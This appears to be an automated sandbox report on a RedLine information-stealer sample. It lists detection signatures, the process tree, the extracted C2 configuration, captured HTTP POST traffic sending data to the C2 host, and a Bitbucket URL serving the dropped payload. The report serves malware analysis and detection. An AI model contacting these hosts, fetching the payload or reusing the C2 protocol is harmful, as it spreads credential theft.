Windows Analysis Report kS2dqbsDwD

Overview

General Information

Sample Name: kS2dqbsDwD (renamed file extension from none to exe)
Analysis ID: 452457
MD5: 888ab99280a081717ec5c5749266d1bd
SHA1: 3a071aeadd42c1232ff2878d2adf7f1e4a629180
SHA256: e726f2014db779e3605f60499f84676ceb45160c6d092bedfa115f7e09d693e8
Tags: exe, trojan

Detection

RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected RedLine Stealer
.NET source code contains potential unpacker
.NET source code contains very large strings
May check the online IP address of the machine
Performs DNS queries to domains with low reputation
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample or dropped binary is a compiled AutoHotkey binary
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Connects to a URL shortener service
Contains functionality for reading data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Is looking for software installed on the system
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Credential Stealer

Process Tree

  • System is w10x64
  • kS2dqbsDwD.exe (PID: 5492 cmdline: 'C:\Users\user\Desktop\kS2dqbsDwD.exe' MD5: 888AB99280A081717EC5C5749266D1BD)
    • 325.exe (PID: 4796 cmdline: C:\Users\user\AppData\Roaming\325.exe 325 MD5: 523AC177BFB4FB64A20B60FC0CE3E0E3)
      • 325.exe (PID: 1784 cmdline: {path} MD5: 523AC177BFB4FB64A20B60FC0CE3E0E3)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["yspasenana.xyz:80"], "Bot Id": "world"}

Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security

Memory Dumps

Source | Rule | Description | Author
00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
00000002.00000002.306874811.0000000003A20000.00000004.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
Process Memory Space: 325.exe PID: 4796 | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
Process Memory Space: 325.exe PID: 1784 | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security

Unpacked PEs

Source | Rule | Description | Author
2.2.325.exe.3b45a60.3.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
14.2.325.exe.400000.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
2.2.325.exe.3b45a60.3.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 14.2.325.exe.400000.0.unpack | Malware Configuration Extractor: RedLine {"C2 url": ["yspasenana.xyz:80"], "Bot Id": "world"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\325.exe | ReversingLabs: Detection: 33%
Multi AV Scanner detection for submitted file
Source: kS2dqbsDwD.exe | Virustotal: Detection: 20%
Source: kS2dqbsDwD.exe | ReversingLabs: Detection: 13%
Source: unknown | HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.3:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.25.234.53:443 -> 192.168.2.3:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.217.201.169:443 -> 192.168.2.3:49715 version: TLS 1.2

Networking:

May check the online IP address of the machine
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe | DNS query: name: iplogger.org
Performs DNS queries to domains with low reputation
Source: C:\Users\user\AppData\Roaming\325.exe | DNS query: yspasenana.xyz
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe | DNS query: name: is.gd
Source: global traffic | HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
    Host: yspasenana.xyz
    Content-Length: 144
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
    Host: yspasenana.xyz
    Content-Length: 1125491
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
    Host: yspasenana.xyz
    Content-Length: 1125483
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
    Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 104.192.141.1
Source: Joe Sandbox View | IP Address: 104.25.234.53
Source: Joe Sandbox View | ASN Name: DE-FIRSTCOLOwwwfirst-colonetDE
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe | Code function: 0_2_0000000140060290 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetOpenW,InternetOpenUrlW,FreeLibrary,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,FreeLibrary,DeleteFileW,FreeLibrary,
Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp | String found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: unknown | DNS traffic detected: queries for: iplogger.org
Source: unknown | HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
    Host: yspasenana.xyz
    Content-Length: 144
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
    Connection: Keep-Alive
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://yspasenana.xyz
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://yspasenana.xyz/
                    Source: 325.exe, 0000000E.00000002.363745282.0000000002CC3000.00000004.00000001.sdmpString found in binary or memory: http://yspasenana.xyz4
                    Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://yspasenana.xyz:80/
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: 325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb
                    Source: 325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb/geoip
                    Source: 325.exe, 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                    Source: 325.exe, 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmpString found in binary or memory: https://aui-cdn.atlassian.com
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/c6138a8d-6b23-4fcf-ac63-5ded44dfc386/downloads/cf4ea471-f159-
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307255166.0000000000943000.00000004.00000001.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/is.gd
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpString found in binary or memory: https://bitbucket.org/
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000003.304898256.00000000008FA000.00000004.00000001.sdmpString found in binary or memory: https://bitbucket.org/luisadoma999/admin/downloads/325.exe
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpString found in binary or memory: https://bitbucket.org/luisadoma999/admin/downloads/325.exelq
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmpString found in binary or memory: https://d301sr5gafysq2.cloudfront.net;
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: https://get.adob
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: https://helpx.ad
                    Source: 325.exe, 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/
                    Source: kS2dqbsDwD.exe, kS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmpString found in binary or memory: https://iplogger.org/1Spbs7
                    Source: kS2dqbsDwD.exe, 00000000.00000003.304864468.00000000008C6000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1Spbs7%A_AppData%
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1Spbs7e
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/y
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpString found in binary or memory: https://is.gd/
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpString found in binary or memory: https://is.gd/b
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmpString found in binary or memory: https://is.gd/nKi5S3
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpString found in binary or memory: https://is.gd/nKi5S3$
                    Source: kS2dqbsDwD.exe, 00000000.00000003.304864468.00000000008C6000.00000004.00000001.sdmpString found in binary or memory: https://is.gd/nKi5S3%A_AppData%
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpString found in binary or memory: https://is.gd/nKi5S3H
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363595455.0000000002BEF000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363606561.0000000002BF3000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
                    Source: kS2dqbsDwD.exeString found in binary or memory: https://sectigo.com/CPS0C
                    Source: kS2dqbsDwD.exeString found in binary or memory: https://sectigo.com/CPS0D
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                    Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website;
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.362868644.0000000000EAF000.00000004.00000020.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                    Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
                    Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknown | HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.3:49711 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 104.25.234.53:443 -> 192.168.2.3:49712 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49713 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 52.217.201.169:443 -> 192.168.2.3:49715 version: TLS 1.2
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe | Code function: 0_2_00000001400053A0 GetTickCount,OpenClipboard,GetTickCount,OpenClipboard,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe | Code function: 0_2_0000000140005280 GetClipboardFormatNameW,GetClipboardData,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe | Code function: 0_2_0000000140042E80 GetSystemMetrics,GetSystemMetrics,GetDC,DestroyCursor,DeleteObject,GetIconInfo,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe | Code function: 0_2_0000000140011052 GetKeyboardState,
                    Source: 325.exe, 00000002.00000002.303820429.0000000000B58000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe | Code function: 0_2_00000001400018BA GlobalUnWire,CloseClipboard,SetTimer,GetTickCount,GetTickCount,GetMessageW,GetTickCount,GetFocus,TranslateAcceleratorW,GetKeyState,GetWindowLongW,GetKeyState,GetKeyState,GetKeyState,IsDlgButtonChecked,IsDlgButtonChecked,PostMessageW,IsDlgButtonChecked,IsDlgButtonChecked,IsDialogMessageW,GetTickCount,KillTimer,ShowWindow,GetTickCount,GetForegroundWindow,GetWindowThreadProcessId,GetClassNameW,IsDialogMessageW,SetCurrentDirectoryW,ShowWindow,DragQueryFileW,DragFinish,DragFinish,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CountClipboardFormats,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsDlgButtonChecked,ScreenToClient,IsDlgButtonChecked,IsDlgButtonChecked,GetWindowRect,MulDiv,MulDiv,GetWindowRect,GetWindowRect,GetWindowLongW,SetWindowLongW,MulDiv,MulDiv,IsDlgButtonChecked,ShowWindow,DragFinish,GetWindowLongW,SetWindowLongW,

                    System Summary:

                    .NET source code contains very large strings
                    Source: 325.exe.0.dr, uNotepad/CollectionToSort.cs | Long String: Length: 32771
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/CollectionToSort.cs | Long String: Length: 32771
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/CollectionToSort.cs | Long String: Length: 32771
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/CollectionToSort.cs | Long String: Length: 32771
                    Sample or dropped binary is a compiled AutoHotkey binary
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe | Window found: window name: AutoHotkey
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe | Code function: 0_2_0000000140043AD0 RegisterClipboardFormatW,MoveWindow,GetSysColor,SetBkColor,SetTextColor,GetSysColorBrush,CreateCompatibleDC,SelectObject,BitBlt,SelectObject,DeleteDC,DrawIconEx,ExcludeClipRect,CreateRectRgn,GetClipRgn,GetSysColorBrush,FillRgn,DeleteObject,GetClipBox,FillRect,GetClientRect,MoveWindow,MoveWindow,MoveWindow,InvalidateRect,ShowWindow,GetMenu,CheckMenuItem,NtdllDefWindowProc_W,SendMessageTimeoutW,PostMessageW,PostMessageW,SendMessageTimeoutW,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe | Code function: 0_2_000000014004438A NtdllDefWindowProc_W,PostMessageW,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe | Code function: 0_2_0000000140043BF6 NtdllDefWindowProc_W,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe | Code function: 0_2_0000000140043C50 NtdllDefWindowProc_W,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe | Code function: 0_2_0000000140043C8B SetFocus,NtdllDefWindowProc_W,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe | Code function: 0_2_0000000140043CAC NtdllDefWindowProc_W,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe | Code function: 0_2_0000000140043CD9 NtdllDefWindowProc_W,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe | Code function: 0_2_00000001400492B0: CreateFileW,DeviceIoControl,CloseHandle,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe | Code function: 0_2_00000001400624E0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
                    Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\325.exe 20E702B077D7CF9780192671268C321BB0A76BAEC0A731413A1F04F735EEDCE3
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: String function: 00000001400A6D70 appears 354 times
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: String function: 0000000140086C40 appears 51 times
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: String function: 00000001400A4F28 appears 34 times
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: String function: 00000001400A9358 appears 45 times
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: String function: 0000000140035BF0 appears 107 times
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: String function: 0000000140035870 appears 77 times
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: String function: 00000001400C2598 appears 38 times
                    Source: kS2dqbsDwD.exe Static PE information: invalid certificate
                    Source: kS2dqbsDwD.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST (5 identical entries)
                    Source: 325.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: kS2dqbsDwD.exe, 00000000.00000002.306945204.0000000000880000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs kS2dqbsDwD.exe
                    Source: kS2dqbsDwD.exe, 00000000.00000000.201076729.000000014013D000.00000008.00020000.sdmp Binary or memory string: OriginalFilenameSteam Desktop Authenticator.exeX vs kS2dqbsDwD.exe
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameOtxiH.exe2 vs kS2dqbsDwD.exe
                    Source: kS2dqbsDwD.exe, 00000000.00000002.306924616.0000000000850000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs kS2dqbsDwD.exe
                    Source: kS2dqbsDwD.exe Binary or memory string: OriginalFilenameSteam Desktop Authenticator.exeX vs kS2dqbsDwD.exe
                    Source: 325.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: kS2dqbsDwD.exe Static PE information: Section: .MPRESS1 ZLIB complexity 1.00031240161
                    Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/29@9/5
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140036D50 CreateProcessW,CloseHandle,CloseHandle,GetLastError,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetLastError,FormatMessageW,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400624E0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400C22C0 GetDiskFreeSpaceW,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140088BA0 LoadLibraryExW,EnumResourceNamesW,FindResourceW,LoadResource,LockResource,GetSystemMetrics,FindResourceW,LoadResource,LockResource,SizeofResource,CreateIconFromResourceEx,FreeLibrary,ExtractIconW,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe File created: C:\Users\user\AppData\Roaming\field
                    Source: C:\Users\user\AppData\Roaming\325.exe File created: C:\Users\user\AppData\Local\Temp\tmpBE63.tmp
                    Source: C:\Users\user\AppData\Roaming\325.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll (2 identical entries)
                    Source: C:\Users\user\AppData\Roaming\325.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\325.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1' (2 identical entries)
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe File read: C:\Windows\System32\drivers\etc\hosts (3 identical entries)
                    Source: C:\Users\user\AppData\Roaming\325.exe File read: C:\Windows\System32\drivers\etc\hosts (6 identical entries)
                    Source: kS2dqbsDwD.exe Virustotal: Detection: 20%
                    Source: kS2dqbsDwD.exe ReversingLabs: Detection: 13%
                    Source: unknown Process created: C:\Users\user\Desktop\kS2dqbsDwD.exe 'C:\Users\user\Desktop\kS2dqbsDwD.exe'
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Process created: C:\Users\user\AppData\Roaming\325.exe C:\Users\user\AppData\Roaming\325.exe 325
                    Source: C:\Users\user\AppData\Roaming\325.exe Process created: C:\Users\user\AppData\Roaming\325.exe {path}
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Process created: C:\Users\user\AppData\Roaming\325.exe C:\Users\user\AppData\Roaming\325.exe 325
                    Source: C:\Users\user\AppData\Roaming\325.exe Process created: C:\Users\user\AppData\Roaming\325.exe {path}
                    Source: C:\Users\user\AppData\Roaming\325.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                    Source: Window Recorder Window detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Roaming\325.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: kS2dqbsDwD.exe Static PE information: Image base 0x140000000 > 0x60000000

                    Data Obfuscation:

